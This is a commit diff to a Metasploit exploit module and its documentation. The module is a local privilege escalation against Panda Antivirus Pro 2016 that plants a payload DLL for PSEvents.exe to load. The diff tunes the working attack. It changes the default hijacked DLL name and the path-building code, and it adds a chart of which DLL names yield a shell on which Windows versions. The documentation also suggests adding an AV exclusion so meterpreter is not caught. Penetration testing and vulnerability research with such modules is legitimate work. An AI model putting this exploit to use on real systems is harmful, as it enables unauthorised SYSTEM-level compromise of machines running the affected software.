updated dlls and docs

2016-10-20 20:45:50 -04:00 · 2016-10-20 20:45:50 -04:00 · 12e4fe1c5c
parent 3b548dc3cd
commit 12e4fe1c5c
2 changed files with 24 additions and 11 deletions
--- a/documentation/modules/exploit/windows/local/panda_psevents.md
+++ b/documentation/modules/exploit/windows/local/panda_psevents.md
@ -2,9 +2,12 @@

  Panda Antivirus Pro 2016 16.1.2 is available from [filehippo](http://filehippo.com/download_panda_antivirus_pro_2017/download/b436969174c5ca07a27a0aedf6456c89/) or from an unofficial [git](https://github.com/h00die/MSF-Testing-Scripts/blob/master/Panda_AV_Pro2016_16.1.2.exe).

-  The AV must be running for PSEvents.exe to run and the module to get called, which can take up to an hour.  I put in an exclusion for the AV for the folder to ensure it didn't catch meterpreter in action.
+  The AV must be running for PSEvents.exe to run and the module to get called, which can take up to an hour.  I 32bit meterpreter seems to get caught, so you may need an AV exclusion for the folder to ensure it didn't catch meterpreter in action.

-  The downloads folder can take a few minutes to appear after install, you may want to wait an hour or so, but it will eventually appear.
+  The downloads folder can take a 10-15 minutes to appear after install, and its downloaded by Panda AV from the company.
+
+  1. Theres an HTTP GET request to 23.215.132.154 for /retail/psprofiler/40032/psprofiler_suite.exe
+  2. Then right after HTTP GET request to 23.215.132.154 for /retail/psevents_suite.exe.

 ## Verification Steps

@ -24,7 +27,17 @@

  **DLL**

-  Which DLL to name our payload.  The original vulnerability writeup utilized bcryptPrimitives.dll, however I found which dll to be VERY picky.  CRYPTBASE.dll seemed to work the best and is the default.
+  Which DLL to name our payload.  The original vulnerability writeup utilized bcryptPrimitives.dll, and mentioned several others that could be used.  However the dll seems to be VERY picky.  Default is cryptnet.dll.  See the chart for more details.
+  
+  |                                           | WINHTTP.dll | VERSION.dll | bcryptPrimitives.dll | CRYPTBASE.dll | cryptnet.dll | WININET.dll |
+  |---------------------------------------------------------------|-------------|-------------|----------------------|---------------|--------------|-------------|
+  | 64bit target (1), win10 x64 | CRASH | CRASH | NO |  NO       | valid     |    no |
+  | 64bit target (1), win8.1 x86 | CRASH | CRASH | NO |  valid     | valid     |    no |
+  | 32bit target (0), win10 x64 | CRASH | CRASH | NO | NO        | valid     |    no |
+  | 32bit target (0), win8.1 x86 | CRASH | CRASH | NO |  valid     | valid (caught by av)     |    no |
+  | 32bit target (0), win7sp1 x86 |  |  | valid |       | valid (caught by av)     |     |
+
+  In this chart, `CRASH` means PSEvents.exe crashed on the system.  `NO` means PSEvents didn't crash, but no session was obtained.  `valid` means we got a shell.
  
  **ListenerTimeout**
  
@ -73,7 +86,7 @@
    
       Name             Current Setting  Required  Description
       ----             ---------------  --------  -----------
-       DLL              CRYPTBASE.dll    yes       dll to create (Accepted: WINHTTP.dll, VERSION.dll, bcryptPrimitives.dll, CRYPTBASE.dll, cryptnet.dll, WININET.dll)
+       DLL              CRYPTBASE.dll    yes       dll to create (Accepted: cryptnet.dll, bcryptPrimitives.dll, CRYPTBASE.dll)
       ListenerTimeout  3610             yes       Number of seconds to wait for the exploit
       SESSION          1                yes       The session to run this module on.
    
--- a/modules/exploits/windows/local/panda_psevents.rb
+++ b/modules/exploits/windows/local/panda_psevents.rb
@ -53,8 +53,8 @@ class MetasploitModule < Msf::Exploit::Local
    ))
    register_options(
      [
-        OptEnum.new('DLL', [ true, 'dll to create', 'CRYPTBASE.dll',
-                             ['WINHTTP.dll', 'VERSION.dll', 'bcryptPrimitives.dll', 'CRYPTBASE.dll', 'cryptnet.dll', 'WININET.dll']]),
+        OptEnum.new('DLL', [ true, 'dll to create', 'cryptnet.dll',
+                             ['cryptnet.dll', 'bcryptPrimitives.dll', 'CRYPTBASE.dll']]),
        OptInt.new('ListenerTimeout', [true, 'Number of seconds to wait for the exploit', 3610]),
      ], self.class)
  end
@ -62,18 +62,18 @@ class MetasploitModule < Msf::Exploit::Local
  def get_path()
    case sysinfo['OS']
    when /Windows (7|8|10|2012|2008)/
-      return '%ProgramData%\\Panda Security\\Panda Devices Agent\\Downloads\\1a2d7253f106c617b45f675e9be08171\\'
+      return '%ProgramData%\\Panda Security\\Panda Devices Agent\\Downloads\\1a2d7253f106c617b45f675e9be08171'
    when /Windows (NT|XP)/
-      return '%AllUsersProfile%\\Application Data\\Panda Security\\Panda Devices Agent\\Downloads\\1a2d7253f106c617b45f675e9be08171\\'
+      return '%AllUsersProfile%\\Application Data\\Panda Security\\Panda Devices Agent\\Downloads\\1a2d7253f106c617b45f675e9be08171'
    end
  end

  def check
-    directory
-    if directory(get_path())
+    if directory?(get_path())
      print_good('Vuln path exists')
      CheckCode::Appears
    else
+      vprint_error("#{get_path()} doesn't exist on target")
      CheckCode::Safe
    end
  end
@ -82,7 +82,7 @@ class MetasploitModule < Msf::Exploit::Local
    vprint_status("OS Detected as: #{sysinfo['OS']}")

    payload_filepath = get_path()
-    payload_filepath = "#{payload_filepath}#{datastore['DLL']}"
+    payload_filepath = "#{payload_filepath}\\#{datastore['DLL']}"
    upload_payload_dll(payload_filepath)

    # start the hour wait